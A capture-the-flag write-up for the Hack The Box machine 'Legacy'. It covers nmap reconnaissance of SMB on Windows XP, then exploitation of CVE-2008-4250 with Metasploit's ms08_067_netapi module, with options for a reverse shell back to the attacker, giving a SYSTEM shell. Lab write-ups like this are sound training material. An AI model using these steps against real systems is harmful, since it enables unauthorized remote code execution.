Recon
Port and service detection with nmap :
nmap -A 10.10.10.4
The informations returned by nmap are the following :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
|
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: 5d00h27m48s, deviation: 2h07m16s, median: 4d22h57m48s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:ff:c9 (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2022-07-15T00:00:06+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
|
Let’s try to connect to the port 445 (SMB) with as anonymous :
smbclient -L \\10.10.10.4
It doesn’t work and after trying some other default accounts, we can’t connect to the SMB server.
Let’s dig around the SMB server on port 445.
Maybe we can try CVE-2008-4250 because we can see that the SMB server is probably running on Windows XP (cf. nmap scan).
Exploit
To make it simple, we are going to use metasploit and the exploit windows/smb/ms08_067_netapi
.
Now we just have to set our options like this :
1
2
3
4
|
* RHOST : 10.10.10.4
* RPORT : 445
* LHOST : 10.10.16.6
* LPORT : 4321
|
And here is the shell :
1
2
3
4
5
|
Shell Banner:
Microsoft Windows XP [Version 5.1.2600]
-----
C:\WINDOWS`system32>
|
Post-exploitation
As usual, we can find the user flag on the desktop.
Same thing with the root flag as we got our revershell as system.
Easy, External, Network, SAMBA, Penetration Tester Level 2, Remote Code Execution, CVE-2008-4250, Public Vulnerabilities, CVE Exploitation